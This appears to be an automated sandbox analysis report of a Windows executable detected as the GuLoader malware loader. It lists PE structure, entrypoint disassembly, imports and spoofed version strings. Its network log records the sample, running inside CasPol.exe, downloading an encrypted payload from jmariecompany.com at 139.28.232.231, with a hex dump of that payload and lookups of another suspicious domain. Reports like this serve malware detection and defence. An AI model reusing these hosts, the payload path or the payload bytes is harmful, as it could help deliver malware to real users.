
Entrypoint Section: .text

Digitally signed: false

Imagebase: 0x400000

Subsystem: windows gui

Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Time Stamp: 0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]

TLS Callbacks:

CLR (.Net) Version:

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General


OS Version Major: 4

OS Version Minor: 0

File Version Major: 4

File Version Minor: 0

Subsystem Version Major: 4

Subsystem Version Minor: 0

Import Hash: 56a78d55f3f7af51443e58e0ce2fb5f6

Instruction

push ebp

mov ebp, esp

sub esp, 000003F4h

push ebx

push esi

push edi

push 00000020h

pop edi

xor ebx, ebx

push 00008001h

mov dword ptr [ebp-14h], ebx

mov dword ptr [ebp-04h], 0040A2E0h


call dword ptr [004080CCh]

mov esi, dword ptr [004080D0h]

lea eax, dword ptr [ebp-00000140h]

push eax

mov dword ptr [ebp-0000012Ch], ebx

mov dword ptr [ebp-2Ch], ebx


mov dword ptr [ebp-00000140h], 0000011Ch

call esi

test eax, eax

jne 00007F7D8CBB9D7Ah

lea eax, dword ptr [ebp-00000140h]

mov dword ptr [ebp-00000140h], 00000114h

push eax

call esi

mov ax, word ptr [ebp-0000012Ch]

mov ecx, dword ptr [ebp-00000112h]

sub ax, 00000053h

add ecx, FFFFFFD0h

neg ax

sbb eax, eax

mov byte ptr [ebp-26h], 00000004h

not eax

and eax, ecx

mov word ptr [ebp-2Ch], ax

cmp dword ptr [ebp-0000013Ch], 0Ah

jnc 00007F7D8CBB9D4Ah

and word ptr [ebp-00000132h], 0000h

mov eax, dword ptr [ebp-00000134h]

movzx ecx, byte ptr [ebp-00000138h]

mov dword ptr [00434FB8h], eax

xor eax, eax

mov ah, byte ptr [ebp-0000013Ch]

movzx eax, ax

or eax, ecx

xor ecx, ecx

mov ch, byte ptr [ebp-2Ch]

Entrypoint Preview


movzx ecx, cx

shl eax, 10h

or eax, ecx

Instruction

Programming Language: [EXP] VC++ 6.0 SP5 build 8804

Name Virtual Address Virtual Size Is in Section

IMAGE_DIRECTORY_ENTRY_EXPORT 0x0 0x0

IMAGE_DIRECTORY_ENTRY_IMPORT 0x8610 0xa0 .rdata

IMAGE_DIRECTORY_ENTRY_RESOURCE 0x59000 0x284d0 .rsrc

IMAGE_DIRECTORY_ENTRY_EXCEPTION 0x0 0x0

IMAGE_DIRECTORY_ENTRY_SECURITY 0x0 0x0

IMAGE_DIRECTORY_ENTRY_BASERELOC 0x0 0x0

IMAGE_DIRECTORY_ENTRY_DEBUG 0x0 0x0

IMAGE_DIRECTORY_ENTRY_COPYRIGHT 0x0 0x0

IMAGE_DIRECTORY_ENTRY_GLOBALPTR 0x0 0x0

IMAGE_DIRECTORY_ENTRY_TLS 0x0 0x0

IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG 0x0 0x0

IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT 0x0 0x0

IMAGE_DIRECTORY_ENTRY_IAT 0x8000 0x2b0 .rdata

IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT 0x0 0x0

IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR 0x0 0x0

IMAGE_DIRECTORY_ENTRY_RESERVED 0x0 0x0

Name Virtual Address Virtual Size Raw Size Xored PE ZLIB Complexity File Type Entropy Characteristics

.text 0x1000 0x6897 0x6a00 False 0.666126179245 data 6.45839821493 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

.rdata 0x8000 0x14a6 0x1600 False 0.439275568182 data 5.02410928126 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

.data 0xa000 0x2b018 0x600 False 0.521484375 data 4.15458210409 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

.ndata 0x36000 0x23000 0x0 False 0 empty 0.0 IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ

.rsrc 0x59000 0x284d0 0x28600 False 0.555334510449 data 6.08130361493 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name RVA Size Type Language Country

RT_ICON 0x59358 0x10828 dBase III DBT, version number 0, next free block index 40

English United States

RT_ICON 0x69b80 0x94a8 data English United States

RT_ICON 0x73028 0x5488 data English United States

RT_ICON 0x784b0 0x4228 dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 33, next used block 0


RT_ICON 0x7c6d8 0x25a8 dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0


RT_ICON 0x7ec80 0x10a8 dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0


RT_ICON 0x7fd28 0x988 data English United States

RT_ICON 0x806b0 0x468 GLS_BINARY_LSB_FIRST English United States

RT_DIALOG 0x80b18 0x100 data English United States

RT_DIALOG 0x80c18 0x11c data English United States

RT_DIALOG 0x80d38 0xc4 data English United States

Rich Headers

Data Directories

Sections

Resources


RT_DIALOG 0x80e00 0x60 data English United States

RT_GROUP_ICON 0x80e60 0x76 data English United States

RT_VERSION 0x80ed8 0x2b4 data English United States

RT_MANIFEST 0x81190 0x33e XML 1.0 document, ASCII text, with very long lines, with no line terminators


Name RVA Size Type Language Country

DLL Import

ADVAPI32.dll RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW

SHELL32.dll SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW

ole32.dll OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree

COMCTL32.dll ImageList_Create, ImageList_Destroy, ImageList_AddMasked

USER32.dll GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu

GDI32.dll SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject

KERNEL32.dll GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Description Data

LegalCopyright Wyndham International Inc

FileVersion 16.9.22

CompanyName GreenPoint Financial Corp.

LegalTrademarks BorgWarner Inc.

Comments Walgreen Co

ProductName Systemax Inc.

FileDescription Fortinet Inc.

Translation 0x0409 0x04b0

Language of compilation system Country where language is spoken Map


Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution


Total Packets: 50

• 53 (DNS)

• 80 (HTTP)

Timestamp Source Port Dest Port Source IP Dest IP

Jun 2, 2022 16:46:17.339750051 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.522840977 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.523098946 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.523752928 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.697953939 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.703290939 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.703397989 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.703445911 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.703491926 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.703519106 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.703552961 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.703568935 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.703628063 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.703632116 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.703651905 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.703701973 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.703746080 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.703756094 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.703793049 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.703824043 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.703871965 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.703882933 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.703918934 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.703977108 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.704030991 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.888196945 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.888259888 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.888308048 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.888354063 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.888381958 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.888425112 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.888494015 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.888556957 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.889170885 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.889271021 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.889318943 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.889369011 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.889372110 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.889442921 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.889492989 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.889511108 CEST 49746 80 192.168.11.20 139.28.232.231

TCP Packets


Jun 2, 2022 16:46:17.889533997 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.889559984 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.889616966 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.889652967 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.889671087 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.889715910 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.889731884 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.889792919 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.889832973 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.889846087 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.889904022 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.889908075 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.889955997 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.889971018 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.890027046 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.890028954 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.890080929 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.890093088 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.890182018 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.890260935 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.101731062 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.101799965 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.101846933 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.101892948 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.102013111 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.102062941 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.102076054 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.103296041 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.103430986 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.103466034 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.103528976 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.103585958 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.103636026 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.103684902 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.103745937 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.103792906 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.103802919 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.103861094 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.103900909 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.103916883 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.103949070 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.103991985 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.104007006 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.104058027 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.104095936 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.104111910 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.104166985 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.104167938 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.104221106 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.104231119 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.104269028 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.104293108 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.104329109 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.104350090 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.104401112 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.104404926 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.104449987 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.104464054 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.104497910 CEST 49746 80 192.168.11.20 139.28.232.231




Jun 2, 2022 16:46:17.313322067 CEST 64547 53 192.168.11.20 1.1.1.1

Jun 2, 2022 16:46:17.329067945 CEST 53 64547 1.1.1.1 192.168.11.20

Jun 2, 2022 16:46:29.524741888 CEST 53471 53 192.168.11.20 1.1.1.1

Jun 2, 2022 16:46:30.537839890 CEST 53471 53 192.168.11.20 9.9.9.9

Jun 2, 2022 16:46:30.541223049 CEST 53 53471 9.9.9.9 192.168.11.20

Jun 2, 2022 16:46:30.963263988 CEST 53 53471 1.1.1.1 192.168.11.20

Timestamp Source IP Dest IP Trans ID OP Code Name Type Class

Jun 2, 2022 16:46:17.313322067 CEST 192.168.11.20 1.1.1.1 0x2081 Standard query (0)

jmariecompany.com

A (IP address) IN (0x0001)

Jun 2, 2022 16:46:29.524741888 CEST 192.168.11.20 1.1.1.1 0xa522 Standard query (0)

alighierieventos.com


Jun 2, 2022 16:46:30.537839890 CEST 192.168.11.20 9.9.9.9 0xa522 Standard query (0)

alighierieventos.com


Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class

Jun 2, 2022 16:45:40.144823074 CEST

1.1.1.1 192.168.11.20 0xa3c4 No error (0) www-bing-com.dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

CNAME (Canonical name)

IN (0x0001)

Jun 2, 2022 16:45:40.144823074 CEST

1.1.1.1 192.168.11.20 0xa3c4 No error (0) dual-a-0001.a-msedge.net

13.107.21.200 A (IP address) IN (0x0001)

Jun 2, 2022 16:45:40.144823074 CEST

1.1.1.1 192.168.11.20 0xa3c4 No error (0) dual-a-0001.a-msedge.net

204.79.197.200 A (IP address) IN (0x0001)

Jun 2, 2022 16:45:40.294567108 CEST

1.1.1.1 192.168.11.20 0x1fe8 No error (0) devcenterapi.azure-api.net

apimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.net


IN (0x0001)

Jun 2, 2022 16:45:40.294567108 CEST

1.1.1.1 192.168.11.20 0x1fe8 No error (0) devcenterapi-eastus-01.regional.azure-api.net

apimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.net


IN (0x0001)

Jun 2, 2022 16:46:17.329067945 CEST

1.1.1.1 192.168.11.20 0x2081 No error (0) jmariecompany.com

139.28.232.231 A (IP address) IN (0x0001)

Jun 2, 2022 16:46:30.541223049 CEST

9.9.9.9 192.168.11.20 0xa522 Name error (3) alighierieventos.com

none none A (IP address) IN (0x0001)

Jun 2, 2022 16:46:30.963263988 CEST

1.1.1.1 192.168.11.20 0xa522 No error (0) alighierieventos.com

50.31.177.39 A (IP address) IN (0x0001)

jmariecompany.com

Session ID Source IP Source Port Destination IP Destination Port Process

0 192.168.11.20 49746 139.28.232.231 80 C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

TimestampkBytestransferred

Direction Data

Jun 2, 2022 16:46:17.523752928 CEST

469 OUT GET /Buhari0f_XGXisVNVRE198.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: jmariecompany.comCache-Control: no-cache

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets


Jun 2, 2022 16:46:17.703290939 CEST

471 IN HTTP/1.1 200 OKDate: Thu, 02 Jun 2022 14:46:17 GMTServer: ApacheLast-Modified: Wed, 01 Jun 2022 23:51:39 GMTAccept-Ranges: bytesContent-Length: 214592Content-Type: application/octet-streamData Raw: 5d 54 94 7f d1 ed 07 27 83 8f ba 03 ce 96 eb fc 2c b5 97 d4 5b 52 96 47 ad d8 f2 5b 13 86 92 e5 81 d8 dc a5 97 a6 59 ab f4 72 57 b3 16 77 97 0f e7 55 76 e9 b1 d8 8e d1 e6 6b f8 9e c1 36 b6 85 d9 d2 67 61 24 af 97 88 09 90 ec 70 fb ef 57 77 22 dc 0a 70 7b 78 bf dd 31 b1 7b de 9e 59 4b cc 6b 58 d4 da 19 72 30 fc fe ab 5a 6b 87 16 55 23 14 d9 7a 96 6c 2e a9 a1 2c 7c a9 2f 3c 42 3a 84 35 61 b9 80 d7 56 a1 ce 5e 5f 0a 90 cf 09 79 c5 56 bc a0 57 17 4b c4 52 84 c2 1f b4 1e 8e 89 c0 bf e8 fd 02 8c ff 06 d0 af 38 fe c5 38 0c d1 a3 ba 74 5e be bd c5 a0 3e e5 e7 4c e9 b8 a9 1e 93 51 aa 47 29 ba f2 97 06 28 91 17 4a 87 22 7f 4e a8 d9 68 49 a8 8e 11 ba 52 48 8c e7 b2 3b 2d f3 54 51 66 be f4 47 85 5e c9 b4 d2 a1 ce e3 49 36 0b 89 dd 65 55 78 4c c3 6b 82 c6 57 70 f5 b0 a9 c1 f4 45 0e c2 fb 3f 03 1d 63 74 3d 9d b5 9a 7e 56 08 26 0e 73 7f 19 fb 77 4c a5 a4 47 f0 21 78 dc b4 e0 1f 1a 07 f7 3c ae 63 e7 38 bc 04 2c 33 b9 96 7f d3 33 82 3d 36 c5 87 f0 1f 0b 06 16 48 0d 28 ae 90 ad d5 49 6c ce 07 c9 cc 74 fb 1c ec b6 89 1e a9 af d1 06 7a 86 2f 20 91 2b 77 c0 aa 81 9b 59 09 f7 98 14 57 73 6b b2 66 a3 58 77 d5 4d 84 69 59 a2 96 e7 ea eb 4e db f3 dd f1 50 20 d6 7b 95 b1 32 8b f4 5e 13 6b b8 82 fc 3c cb 2a 2f 18 92 f2 93 39 87 6a ff 0c 90 39 af 06 01 e5 b3 39 e4 3c 74 15 ad 6e b5 e3 16 f0 86 59 6d 8c 96 90 b0 cb 36 f2 02 b3 95 33 a2 e9 9c 09 9c 1d c5 67 73 13 09 14 b6 be a1 08 d1 43 9e 0f 9c 58 18 9c c9 35 81 bc d4 6a 4a 21 b5 0b 27 58 3e 7b 3c f5 30 3a 48 fd 42 97 2d 5a 4a 98 b1 86 d0 c6 78 fd 3d 9d cf ba 23 57 ad ea 5b 29 5d 9a cd b7 37 d5 c0 09 b2 2e 99 6c 96 52 1d 3e 88 94 d3 c7 33 75 70 3b c8 0e 18 87 d4 0c b3 fb ae 94 ed 00 10 21 1c 3d bc c1 07 1b e5 1f df 95 9f e6 aa c6 1f e8 3c 45 d4 1e 01 f3 03 f1 54 99 75 55 f4 57 76 ac 00 b3 71 01 3d fe 01 45 ec c5 b0 65 25 97 a7 88 f1 59 42 7b c4 b0 cf 8f bd 20 06 71 77 ac 86 37 f3 6e 79 33 17 68 82 ef fd af 9d cb e8 e4 55 2b 37 07 67 21 22 67 34 f1 b8 21 8b 4e b4 db 7f 2f 72 9d b3 49 44 a5 af e2 d3 96 3b 4f 77 b7 2b 3c fc ba 4b 0f 34 15 d7 7f 56 7b 08 18 4f e2 d8 0f c9 92 3b 53 da 99 76 67 64 09 d9 a4 ab 21 d6 f6 ff d8 30 be 4d 98 00 77 68 f6 43 91 68 50 01 60 61 39 96 ec 3f 52 ec 95 09 7a 1b 4c 26 01 49 4a 22 36 09 97 a9 ef 33 d3 ed 1e 36 72 d4 33 60 32 e5 a5 52 c2 b2 ae 94 c1 ef b4 68 57 69 79 dc 50 ad 27 29 59 fd e8 57 2e 6a b6 49 dc aa 0a 5f eb e1 8c 37 06 9b b9 f6 fa 8f 69 91 22 b3 8a 27 7f 19 b2 33 54 b9 31 46 ae fb c2 77 4077 af a0 92 6e 6c ff f3 1b 90 d6 06 5f e9 81 03 7c 98 6f 42 0e 30 ae 83 51 94 fb d5 66 a3 f7 3c d2 10 ff f1 18 8f 0e 7c 83 f6 12 a5 e6 9a 3a 25 ce 94 f3 f3 a5 b6 cd dc f0 7a 38 c0 92 d8 58 97 c9 c0 85 6b 52 23 d5 3b c8 cb 28 88 02 43 f5 af 75 69 6b 05 42 b9 9f 23 19 b7 13 db 48 35 28 8c 49 4e be db e0 15 a5 ed 96 ee 4b e9 1d 21 6a 4f ec 78 89 43 93 d6 3e 07 63 5e a0 a3 9d 35 ac c6 68 50 87 b2 a2 94 88 f3 0e 2a af 97 82 27 83 dc 72 04 3e 57 77 9a d9 0a 70 6a 6e b4 f6 6a b1 7c c9 60 58 67 ce 73 53 d4 dd 0f 8c 31 d0 fc bc 51 6b 80 0e ab 22 38 db 51 94 47 cd ab a2 04 6d a9 2f b6 6a 28 84 3b 74 29 8e d7 f1 98 01 7f cf 0b dc 02 2e 2d ad 2e d9 8b 0c 7e 24 a4 37 1b ae 13 d5 67 eb e7 a8 dd 36 9e 4b ae 9a 78 be 88 49 6e e4 50 41 a9 81 fc f8 38 f3 80 c8 ad 3e eb f4 7c eb b8 85 1e 93 01 e8 47 29 e7 e5 9f 2d 79 1d 76 3f 79 23 53 4c b0 d2 68 4e 5e 70 12 97 5b 5e 8c e7 b5 1f d0 f2 78 5b 4d bc df a4 55 5b 67 ef d3 89 da c3 49 3c 21 9a ed 67 55 50 0c c3 6b aa c6 57 61 e1 bb 82 de f4 42 19 3c fa 13 01 01 68 74 Data Ascii: ]T',[RG[YrWwUvk6ga$pWw"p{x1{YKkXr0ZkU#zl.,|/<B:5aV^_yVWKR88t^>LQG)(J"NhIRH;-TQfGÎ6eUxLkWpE?ct=~V&swLG!x<c8,33=6H(Iltz/ +wYWskfXwMiYNP {2^k<*/9j99<tnYm63gsCX5jJ!'X>{<0:HB-ZJx=#W[)]7.lR>3up;!=<ETuUWvq=Ee%YB{ qw7ny3hU+7g!"g4!N/rID;Ow+<K4V{O;Svgd!0MwhChPà9?RzL&IJ"636r3`2RhWiyP')YW.jI_7i"'3T1Fw@wnl_|oB0Qf<|:%z8XkR#;(CuikB#H5(INK!jOxC>c^5hP*'r>Wwpjnj|`XgsS1Qk"8QGm/j(;t).-.~$7g6KxInPA8>|G)-yv?y#SLhN^p[^x[MU[gI<!gUPkWaB<ht

TimestampkBytestransferred

Direction Data

• ref002062022pago062022.exe

• CasPol.exe

• CasPol.exe

• CasPol.exe

• CasPol.exe

• CasPol.exe

• conhost.exe

• svchost.exe

Click to jump to process

Statistics

Behavior

System Behavior

Analysis Process: ref002062022pago062022.exe PID: 3504, Parent PID: 8512


Target ID: 0

Start time: 16:45:47

Start date: 02/06/2022

Path: C:\Users\user\Desktop\ref002062022pago062022.exe

Wow64 process (32bit): true

Commandline: "C:\Users\user\Desktop\ref002062022pago062022.exe"

Imagebase: 0x400000

File size: 275627 bytes

MD5 hash: 7500C0E8DF88D12316724078FFBEEFAA

Has elevated privileges: true

Has administrator privileges:

true

Programmed in: C, C++ or other language

Yara matches: Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1514512086.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security

Reputation: low

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Key Path Completion Count Source Address Symbol

Key Path Name Type Data Completion Count Source Address Symbol

Target ID: 3



Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Wow64 process (32bit): false


Imagebase: 0x3e0000


MD5 hash: 914F728C04D3EDDD5FBA59420E74E56B



true


Reputation: moderate

Target ID: 4






Imagebase: 0x240000





true

General

File Activities

Registry Activities

Analysis Process: CasPol.exe PID: 1664, Parent PID: 3504

General


General




Target ID: 5






Imagebase: 0x200000





true



Target ID: 6






Imagebase: 0x300000





true



Target ID: 7




Wow64 process (32bit): true


Imagebase: 0xce0000





true

Programmed in: .Net C# or VB.NET

